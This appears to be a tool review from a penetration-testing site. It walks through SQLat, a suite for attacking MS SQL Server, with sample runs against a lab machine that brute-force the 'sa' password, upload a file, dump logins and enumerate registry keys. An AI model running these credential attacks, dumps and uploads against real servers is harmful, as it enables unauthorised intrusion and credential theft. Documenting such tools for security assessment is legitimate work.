The Web Local
 

 

 

SQL Auditing Tools, (SQLat)

 

SQLat is a nice suite of tools which come in handy when trying to carry out a vulnerability assessment/penetration test against a MS SQL Server.

 

SQLat encompasses the following tools:

 

  • sqlanlz - Enumerates information about databases, users, extended stored procedures etc. outputting into an HTML report.
  • sqldict - Carries out a dictionary based attack on the user(s) specified.
  • sqldirtree - Outputs an ASCII directory tree of the base dir specified.
  • sqldumplogins - Dump all user accounts from the MS SQL Server.
  • sqlquery - Interactive query tool.
  • sqlregenumkey - Enumerate registry keys.
  • sqlreggetvalue - Enumerates values for a specific registry key.
  • sqlsamdump - Attempts to dump the SAM from a SQL Server using pwdump2.
  • sqlupload - Attempts to upload files to a MS SQL Server.

 

Note: - The tool temporarily restores the xp_cmdshell if it is removed and the dll is still left on the system and you do require credentials for a number of the above to work correctly.

 

SQLAT is based on the freetds library and as of version 1.0.6 supports NTLM integrated login. It does not do named pipes yet.

 

Installation:

 

SQLat has a number of prior requisites:

 

 

FreeTDS needs to be installed first with the usual procedure for a tar.gz file:

./configure

make

make install

 

pwdump2 needs to be unzipped to an appropriate directory.

 

to install SQLat use the following commands:

 

./configure --with-tdsver=7.0

 

or at least with the above parameter.

 

make

make install

 

It is available from here.

 

Execution and expected output:

 

[root@hacker bin]# ./sqldict

SQLDict v1.1.0 by patrik@cqure.net

----------------------------------

usage: ./sqldict [options]

-i* <ip|ipfile> to probe

-t port (default 1433)

-u* <userfile>

-p* <dicfile>

-r <reportfile>

-v verbose

 

[root@hacker bin]# ./sqldict -i 192.168.1.175 -u user.txt -p password.txt

IP: 192.168.1.175 User: sa Pass: password

 

Obviously got the easy password for sa as "password"

 

[root@hacker bin]# ./sqlquery

SQLExec v1.1.0 by <patrik@cqure.net>

------------------------------------

./sqlquery [options]

-i* <ipaddress>

-t port (default 1433)

-q <query> (if ommited execute interactive mode)

-u username

-p password

 

[root@hacker bin]# ./sqlquery -i 192.168.1.175 -u sa -p password -q "select @@version"

SQLExec v1.1.0 by <patrik@cqure.net>

------------------------------------------

Microsoft SQL Server 7.00 - 7.00.623 (Intel X86)

Nov 27 1998 22:20:07

Copyright (c) 1988-1998 Microsoft Corporation

Standard Edition on Windows NT 4.0 (Build 1381: Service Pack 6)

 

Passes an sql query to determine the version of the database, obviously with this example we are using the credentials we have broken out earlier.

 

[root@hacker bin]# ./sqlupload

SQLUPLOAD v1.1.0 by patrik@cqure.net

------------------------------------

usage: ./sqlupload [options]

-i* <ipaddress> to probe

-t port (default 1433)

-f* <filename> to upload

-u username

-p password

-T path to tempdir if not autodetected

-h this

-v verbose

 

[root@hacker bin]# ./sqlupload -i 192.168.1.175 -u sa -p password -f user.txt -v

SQLUpload by Patrik Karlsson <patrik@cqure.net>

-- Logging in to 192.168.1.175 --

-- Searching for temp path --

Your file will be in c:\temp

-- Uploading user.txt --

 

An attempt to upload a file with sa credentials succeeding.

 

[root@hacker bin]# ./sqldumplogins

SQLDumpLogins v1.1.0 by <patrik@cqure.net>

------------------------------------------

./sqldumplogins [options]

-i* <ipaddress>

-t port (default 1433)

-u username

-p password

[root@hacker bin]# ./sqldumplogins -i 192.168.1.175 -u sa -p password

SQLDumpLogins v1.1.0 by <patrik@cqure.net>

------------------------------------------

Administrator

sa

 

Enumerating all users on the remote machines utilising the privileges gained previously.

 

[root@hacker bin]# ./sqlregenumkey

./sqlregenumkey: option requires an argument -- k

SQLRegEnum v1.1.0 by <patrik@cqure.net>

---------------------------------------

./sqlregenumkey [options]

-i* <ipaddress>

-t port (default 1433)

-k <key> (default HKLM\SW\MS\Win\CurrVer\Run)

-u <username>

-p <password>

 

[root@hacker bin]# ./sqlregenumkey -i 192.168.1.175 -u sa -p password -k

SQLRegEnum v1.1.0 by <patrik@cqure.net>

------------------------------------------

SystemTray=SysTray.Exe

BrowserWebCheck=loadwc.exe

SchedulingAgent=mstinit.exe /logon

VMware Tools=C:\Program Files\VMware\VMware Tools\VMwareTray.exe

VMware User Process=C:\Program Files\VMware\VMware Tools\VMwareUser.exe

 

Enumerates what processes run at system boot, obviously in this case we are attacking a VM machine.

 

 

IT Security News:

 

Pen Testing Framework:

 

Latest Tool Reviews: